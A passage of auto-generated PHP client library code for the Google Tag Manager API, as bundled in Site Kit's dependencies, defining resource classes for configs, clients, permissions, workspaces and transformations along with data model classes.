WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListGtagConfigResponse; /** * The "gtag_config" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $gtag_config = $tagmanagerService->accounts_containers_workspaces_gtag_config; * </code> */ class AccountsContainersWorkspacesGtagConfig extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a Google tag config. (gtag_config.create) * * @param string $parent Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param GtagConfig $postBody * @param array $optParams Optional parameters. * @return GtagConfig * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class); } /** * Deletes a Google tag config. (gtag_config.delete) * * @param string $path Google tag config's API relative path. Example: accounts/ * {account_id}/containers/{container_id}/workspaces/{workspace_id}/gtag_config/ * {gtag_config_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a Google tag config. (gtag_config.get) * * @param string $path Google tag config's API relative path. Example: accounts/ * {account_id}/containers/{container_id}/workspaces/{workspace_id}/gtag_config/ * {gtag_config_id} * @param array $optParams Optional parameters. * @return GtagConfig * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class); } /** * Lists all Google tag configs in a Container. * (gtag_config.listAccountsContainersWorkspacesGtagConfig) * * @param string $parent Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListGtagConfigResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesGtagConfig($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListGtagConfigResponse::class); } /** * Updates a Google tag config. (gtag_config.update) * * @param string $path Google tag config's API relative path. Example: accounts/ * {account_id}/containers/{container_id}/workspaces/{workspace_id}/gtag_config/ * {gtag_config_id} * @param GtagConfig $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the config in storage. * @return GtagConfig * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesGtagConfig::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesGtagConfig'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Client; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListClientsResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertClientResponse; /** * The "clients" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $clients = $tagmanagerService->accounts_containers_workspaces_clients; * </code> */ class AccountsContainersWorkspacesClients extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Client. (clients.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Client $postBody * @param array $optParams Optional parameters. * @return Client * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class); } /** * Deletes a GTM Client. (clients.delete) * * @param string $path GTM Client's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/clients/{client_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Client. (clients.get) * * @param string $path GTM Client's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/clients/{client_id} * @param array $optParams Optional parameters. * @return Client * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class); } /** * Lists all GTM Clients of a GTM container workspace. * (clients.listAccountsContainersWorkspacesClients) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListClientsResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesClients($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListClientsResponse::class); } /** * Reverts changes to a GTM Client in a GTM Workspace. (clients.revert) * * @param string $path GTM Client's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/clients/{client_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the client in storage. * @return RevertClientResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertClientResponse::class); } /** * Updates a GTM Client. (clients.update) * * @param string $path GTM Client's API relative path. Example: accounts/{accoun * t_id}/containers/{container_id}/workspaces/{workspace_id}/clients/{client_id} * @param Client $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the client in storage. * @return Client * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesClients::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesClients'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListUserPermissionsResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission; /** * The "user_permissions" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $user_permissions = $tagmanagerService->accounts_user_permissions; * </code> */ class AccountsUserPermissions extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a user's Account & Container access. (user_permissions.create) * * @param string $parent GTM Account's API relative path. Example: * accounts/{account_id} * @param UserPermission $postBody * @param array $optParams Optional parameters. * @return UserPermission * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission::class); } /** * Removes a user from the account, revoking access to it and all of its * containers. (user_permissions.delete) * * @param string $path GTM UserPermission's API relative path. Example: * accounts/{account_id}/user_permissions/{user_permission_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a user's Account & Container access. (user_permissions.get) * * @param string $path GTM UserPermission's API relative path. Example: * accounts/{account_id}/user_permissions/{user_permission_id} * @param array $optParams Optional parameters. * @return UserPermission * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission::class); } /** * List all users that have access to the account along with Account and * Container user access granted to each of them. * (user_permissions.listAccountsUserPermissions) * * @param string $parent GTM Account's API relative path. Example: * accounts/{account_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListUserPermissionsResponse * @throws \Google\Service\Exception */ public function listAccountsUserPermissions($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListUserPermissionsResponse::class); } /** * Updates a user's Account & Container access. (user_permissions.update) * * @param string $path GTM UserPermission's API relative path. Example: * accounts/{account_id}/user_permissions/{user_permission_id} * @param UserPermission $postBody * @param array $optParams Optional parameters. * @return UserPermission * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsUserPermissions::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsUserPermissions'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateContainerVersionRequestVersionOptions; use Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateContainerVersionResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity; use Google\Site_Kit_Dependencies\Google\Service\TagManager\GetWorkspaceStatusResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListWorkspacesResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\QuickPreviewResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncWorkspaceResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace; /** * The "workspaces" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $workspaces = $tagmanagerService->accounts_containers_workspaces; * </code> */ class AccountsContainersWorkspaces extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a Workspace. (workspaces.create) * * @param string $parent GTM parent Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param Workspace $postBody * @param array $optParams Optional parameters. * @return Workspace * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace::class); } /** * Creates a Container Version from the entities present in the workspace, * deletes the workspace, and sets the base container version to the newly * created version. (workspaces.create_version) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param CreateContainerVersionRequestVersionOptions $postBody * @param array $optParams Optional parameters. * @return CreateContainerVersionResponse * @throws \Google\Service\Exception */ public function create_version($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateContainerVersionRequestVersionOptions $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create_version', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateContainerVersionResponse::class); } /** * Deletes a Workspace. (workspaces.delete) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a Workspace. (workspaces.get) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * @return Workspace * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace::class); } /** * Finds conflicting and modified entities in the workspace. * (workspaces.getStatus) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * @return GetWorkspaceStatusResponse * @throws \Google\Service\Exception */ public function getStatus($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('getStatus', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\GetWorkspaceStatusResponse::class); } /** * Lists all Workspaces that belong to a GTM Container. * (workspaces.listAccountsContainersWorkspaces) * * @param string $parent GTM parent Container's API relative path. Example: * accounts/{account_id}/containers/{container_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListWorkspacesResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspaces($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListWorkspacesResponse::class); } /** * Quick previews a workspace by creating a fake container version from all * entities in the provided workspace. (workspaces.quick_preview) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * @return QuickPreviewResponse * @throws \Google\Service\Exception */ public function quick_preview($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('quick_preview', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\QuickPreviewResponse::class); } /** * Resolves a merge conflict for a workspace entity by updating it to the * resolved entity passed in the request. (workspaces.resolve_conflict) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Entity $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the entity_in_workspace in the merge conflict. * @throws \Google\Service\Exception */ public function resolve_conflict($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('resolve_conflict', [$params]); } /** * Syncs a workspace to the latest container version by updating all unmodified * workspace entities and displaying conflicts for modified entities. * (workspaces.sync) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * @return SyncWorkspaceResponse * @throws \Google\Service\Exception */ public function sync($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('sync', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncWorkspaceResponse::class); } /** * Updates a Workspace. (workspaces.update) * * @param string $path GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Workspace $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the workspace in storage. * @return Workspace * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Workspace::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspaces::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspaces'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource; use Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTransformationsResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTransformationResponse; use Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation; /** * The "transformations" collection of methods. * Typical usage is: * <code> * $tagmanagerService = new Google\Service\TagManager(...); * $transformations = $tagmanagerService->accounts_containers_workspaces_transformations; * </code> */ class AccountsContainersWorkspacesTransformations extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a GTM Transformation. (transformations.create) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param Transformation $postBody * @param array $optParams Optional parameters. * @return Transformation * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class); } /** * Deletes a GTM Transformation. (transformations.delete) * * @param string $path GTM Transformation's API relative path. Example: accounts * /{account_id}/containers/{container_id}/workspaces/{workspace_id}/transformat * ions/{transformation_id} * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a GTM Transformation. (transformations.get) * * @param string $path GTM Transformation's API relative path. Example: accounts * /{account_id}/containers/{container_id}/workspaces/{workspace_id}/transformat * ions/{transformation_id} * @param array $optParams Optional parameters. * @return Transformation * @throws \Google\Service\Exception */ public function get($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class); } /** * Lists all GTM Transformations of a GTM container workspace. * (transformations.listAccountsContainersWorkspacesTransformations) * * @param string $parent GTM Workspace's API relative path. Example: * accounts/{account_id}/containers/{container_id}/workspaces/{workspace_id} * @param array $optParams Optional parameters. * * @opt_param string pageToken Continuation token for fetching the next page of * results. * @return ListTransformationsResponse * @throws \Google\Service\Exception */ public function listAccountsContainersWorkspacesTransformations($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTransformationsResponse::class); } /** * Reverts changes to a GTM Transformation in a GTM Workspace. * (transformations.revert) * * @param string $path GTM Transformation's API relative path. Example: accounts * /{account_id}/containers/{container_id}/workspaces/{workspace_id}/transformat * ions/{transformation_id} * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the transformation in storage. * @return RevertTransformationResponse * @throws \Google\Service\Exception */ public function revert($path, $optParams = []) { $params = ['path' => $path]; $params = \array_merge($params, $optParams); return $this->call('revert', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTransformationResponse::class); } /** * Updates a GTM Transformation. (transformations.update) * * @param string $path GTM Transformation's API relative path. Example: accounts * /{account_id}/containers/{container_id}/workspaces/{workspace_id}/transformat * ions/{transformation_id} * @param Transformation $postBody * @param array $optParams Optional parameters. * * @opt_param string fingerprint When provided, this fingerprint must match the * fingerprint of the transformation in storage. * @return Transformation * @throws \Google\Service\Exception */ public function update($path, \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation $postBody, $optParams = []) { $params = ['path' => $path, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTransformations::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Resource_AccountsContainersWorkspacesTransformations'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class CreateContainerVersionRequestVersionOptions extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var string */ public $notes; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateContainerVersionRequestVersionOptions::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_CreateContainerVersionRequestVersionOptions'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class AccountAccess extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $permission; /** * @param string */ public function setPermission($permission) { $this->permission = $permission; } /** * @return string */ public function getPermission() { return $this->permission; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\AccountAccess::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_AccountAccess'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertFolderResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $folderType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class; protected $folderDataType = ''; /** * @param Folder */ public function setFolder(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder $folder) { $this->folder = $folder; } /** * @return Folder */ public function getFolder() { return $this->folder; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertFolderResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertFolderResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Parameter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'map'; /** * @var bool */ public $isWeakReference; /** * @var string */ public $key; protected $listType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $listDataType = 'array'; protected $mapType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $mapDataType = 'array'; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param bool */ public function setIsWeakReference($isWeakReference) { $this->isWeakReference = $isWeakReference; } /** * @return bool */ public function getIsWeakReference() { return $this->isWeakReference; } /** * @param string */ public function setKey($key) { $this->key = $key; } /** * @return string */ public function getKey() { return $this->key; } /** * @param Parameter[] */ public function setList($list) { $this->list = $list; } /** * @return Parameter[] */ public function getList() { return $this->list; } /** * @param Parameter[] */ public function setMap($map) { $this->map = $map; } /** * @return Parameter[] */ public function getMap() { return $this->map; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Parameter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Entity extends \Google\Site_Kit_Dependencies\Google\Model { protected $builtInVariableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\BuiltInVariable::class; protected $builtInVariableDataType = ''; /** * @var string */ public $changeStatus; protected $clientType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class; protected $clientDataType = ''; protected $customTemplateType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class; protected $customTemplateDataType = ''; protected $folderType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class; protected $folderDataType = ''; protected $gtagConfigType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class; protected $gtagConfigDataType = ''; protected $tagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class; protected $tagDataType = ''; protected $transformationType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class; protected $transformationDataType = ''; protected $triggerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class; protected $triggerDataType = ''; protected $variableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class; protected $variableDataType = ''; protected $zoneType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class; protected $zoneDataType = ''; /** * @param BuiltInVariable */ public function setBuiltInVariable(\Google\Site_Kit_Dependencies\Google\Service\TagManager\BuiltInVariable $builtInVariable) { $this->builtInVariable = $builtInVariable; } /** * @return BuiltInVariable */ public function getBuiltInVariable() { return $this->builtInVariable; } /** * @param string */ public function setChangeStatus($changeStatus) { $this->changeStatus = $changeStatus; } /** * @return string */ public function getChangeStatus() { return $this->changeStatus; } /** * @param Client */ public function setClient(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Client $client) { $this->client = $client; } /** * @return Client */ public function getClient() { return $this->client; } /** * @param CustomTemplate */ public function setCustomTemplate(\Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate $customTemplate) { $this->customTemplate = $customTemplate; } /** * @return CustomTemplate */ public function getCustomTemplate() { return $this->customTemplate; } /** * @param Folder */ public function setFolder(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder $folder) { $this->folder = $folder; } /** * @return Folder */ public function getFolder() { return $this->folder; } /** * @param GtagConfig */ public function 